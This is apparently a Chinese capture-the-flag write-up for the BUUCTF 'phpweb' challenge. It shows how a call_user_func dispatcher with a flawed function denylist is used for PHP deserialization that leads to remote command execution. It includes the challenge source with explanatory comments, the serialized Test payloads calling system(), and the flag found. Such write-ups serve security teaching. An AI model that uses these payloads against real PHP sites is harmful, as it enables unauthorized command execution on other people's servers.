BUUCTF WEB [网鼎杯 2020 朱雀组]phpweb
-
进入环境,发现调用了
date()
函数;抓包后发现 POST 传参中存在名为 func、值为 date 的参数 -
尝试修改func变量
func=echo&p=Y-m-d+h%3Ai%3As+a
回显
Warning : call_user_func() expects parameter 1 to be a valid callback, function 'echo' not found or invalid function name in <b>/var/www/html/index.php on line 24
-
发现一个PHP代码执行漏洞,可以利用
call_user_func()
进行。尝试 shell_exec、system 等多个函数名均被过滤,于是改为读取 index.php 的源码:
func=file_get_contents&p=index.php
回显
<?php
// Challenge source (index.php) as returned by the file_get_contents read above.
//
// Security note: the dispatcher below is gated by a *denylist* of function
// names rather than an allowlist. "unserialize" is absent from the list, and
// one entry is misspelled ("registregister_shutdown_function"), which shows
// why denylists are brittle: they are only as good as every string in them.
// The robust fix is an allowlist containing only the function(s) this page
// actually needs (here: date).
$disable_fun = array("exec", "shell_exec", "system", "passthru", "proc_open", "show_source", "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch", "escapeshellcmd", "escapeshellarg", "assert", "substr_replace", "call_user_func_array", "call_user_func", "array_filter", "array_walk", "array_map", "registregister_shutdown_function", "register_tick_function", "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce", "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents");

// Invokes $func with the single argument $p through call_user_func() and
// returns the result only when it is a string; any other result type is
// reported as "" (this is why non-string-returning calls show no output).
// Neither argument is validated here; both callers below hand it values that
// ultimately come from the request.
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {
        return "";
    }
}

// With its defaults this object simply prints the current date. Because
// __destruct() fires for every Test instance that is released - including one
// reconstructed by unserialize(), as the writeup demonstrates - the func/p
// properties are handed to gettime() with no $disable_fun check at all; the
// only guard is that func is non-empty.
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}

// Request handling: func is lowercased before the denylist lookup (so the
// check is case-insensitive), while p is passed through unchanged. Note the
// loose comparisons (!=) and the non-strict in_array().
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("Hacker...");
    }
}
?>
-
发现 Test 类的 __destruct() 会把 $this->func 和 $this->p 直接交给 gettime(),而 unserialize 并不在 $disable_fun 中,因此怀疑存在反序列化漏洞
<?php
// Local helper used in the writeup: builds the serialized form of a Test
// object with the same property layout as the challenge's Test class, so the
// text can show exactly what the server-side unserialize() would reconstruct.
class Test {
    var $p = "find / -name flag*";
    var $func = "system";
}

$serialized = serialize(new Test());
print $serialized;
O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
-
构造payload
func=unserialize&p=O%3a4%3a%22Test%22%3a2%3a%7bs%3a1%3a%22p%22%3bs%3a18%3a%22find%20%2f%20-name%20flag*%22%3bs%3a4%3a%22func%22%3bs%3a6%3a%22system%22%3b%7d
回显
/proc/sys/kernel/sched_domain/cpu0/domain0/flags /proc/sys/kernel/sched_domain/cpu1/domain0/flags /proc/sys/kernel/sched_domain/cpu10/domain0/flags /proc/sys/kernel/sched_domain/cpu11/domain0/flags /proc/sys/kernel/sched_domain/cpu12/domain0/flags /proc/sys/kernel/sched_domain/cpu13/domain0/flags /proc/sys/kernel/sched_domain/cpu14/domain0/flags /proc/sys/kernel/sched_domain/cpu15/domain0/flags /proc/sys/kernel/sched_domain/cpu16/domain0/flags /proc/sys/kernel/sched_domain/cpu17/domain0/flags /proc/sys/kernel/sched_domain/cpu18/domain0/flags /proc/sys/kernel/sched_domain/cpu19/domain0/flags /proc/sys/kernel/sched_domain/cpu2/domain0/flags /proc/sys/kernel/sched_domain/cpu20/domain0/flags /proc/sys/kernel/sched_domain/cpu21/domain0/flags /proc/sys/kernel/sched_domain/cpu22/domain0/flags /proc/sys/kernel/sched_domain/cpu23/domain0/flags /proc/sys/kernel/sched_domain/cpu24/domain0/flags /proc/sys/kernel/sched_domain/cpu25/domain0/flags /proc/sys/kernel/sched_domain/cpu26/domain0/flags /proc/sys/kernel/sched_domain/cpu27/domain0/flags /proc/sys/kernel/sched_domain/cpu28/domain0/flags /proc/sys/kernel/sched_domain/cpu29/domain0/flags /proc/sys/kernel/sched_domain/cpu3/domain0/flags /proc/sys/kernel/sched_domain/cpu30/domain0/flags /proc/sys/kernel/sched_domain/cpu31/domain0/flags /proc/sys/kernel/sched_domain/cpu4/domain0/flags /proc/sys/kernel/sched_domain/cpu5/domain0/flags /proc/sys/kernel/sched_domain/cpu6/domain0/flags /proc/sys/kernel/sched_domain/cpu7/domain0/flags /proc/sys/kernel/sched_domain/cpu8/domain0/flags /proc/sys/kernel/sched_domain/cpu9/domain0/flags /sys/devices/pnp0/00:00/tty/ttyS0/flags /sys/devices/platform/serial8250/tty/ttyS15/flags /sys/devices/platform/serial8250/tty/ttyS6/flags /sys/devices/platform/serial8250/tty/ttyS23/flags /sys/devices/platform/serial8250/tty/ttyS13/flags /sys/devices/platform/serial8250/tty/ttyS31/flags /sys/devices/platform/serial8250/tty/ttyS4/flags /sys/devices/platform/serial8250/tty/ttyS21/flags 
/sys/devices/platform/serial8250/tty/ttyS11/flags /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS28/flags /sys/devices/platform/serial8250/tty/ttyS18/flags /sys/devices/platform/serial8250/tty/ttyS9/flags /sys/devices/platform/serial8250/tty/ttyS26/flags /sys/devices/platform/serial8250/tty/ttyS16/flags /sys/devices/platform/serial8250/tty/ttyS7/flags /sys/devices/platform/serial8250/tty/ttyS24/flags /sys/devices/platform/serial8250/tty/ttyS14/flags /sys/devices/platform/serial8250/tty/ttyS5/flags /sys/devices/platform/serial8250/tty/ttyS22/flags /sys/devices/platform/serial8250/tty/ttyS12/flags /sys/devices/platform/serial8250/tty/ttyS30/flags /sys/devices/platform/serial8250/tty/ttyS3/flags /sys/devices/platform/serial8250/tty/ttyS20/flags /sys/devices/platform/serial8250/tty/ttyS10/flags /sys/devices/platform/serial8250/tty/ttyS29/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/platform/serial8250/tty/ttyS19/flags /sys/devices/platform/serial8250/tty/ttyS27/flags /sys/devices/platform/serial8250/tty/ttyS17/flags /sys/devices/platform/serial8250/tty/ttyS8/flags /sys/devices/platform/serial8250/tty/ttyS25/flags /sys/devices/virtual/net/lo/flags /sys/devices/virtual/net/eth0/flags /sys/devices/virtual/net/tunl0/flags /tmp/flagoefiu4r93 /tmp/flagoefiu4r93
-
最后在
/tmp/flagoefiu4r93
中找到 flag,读取该文件:
func=unserialize&p=O%3a4%3a%22Test%22%3a2%3a%7bs%3a1%3a%22p%22%3bs%3a22%3a%22cat%20%2ftmp%2fflagoefiu4r93%22%3bs%3a4%3a%22func%22%3bs%3a6%3a%22system%22%3b%7d
flag{0ae2a444-4095-4452-9301-78e18c2a60b6}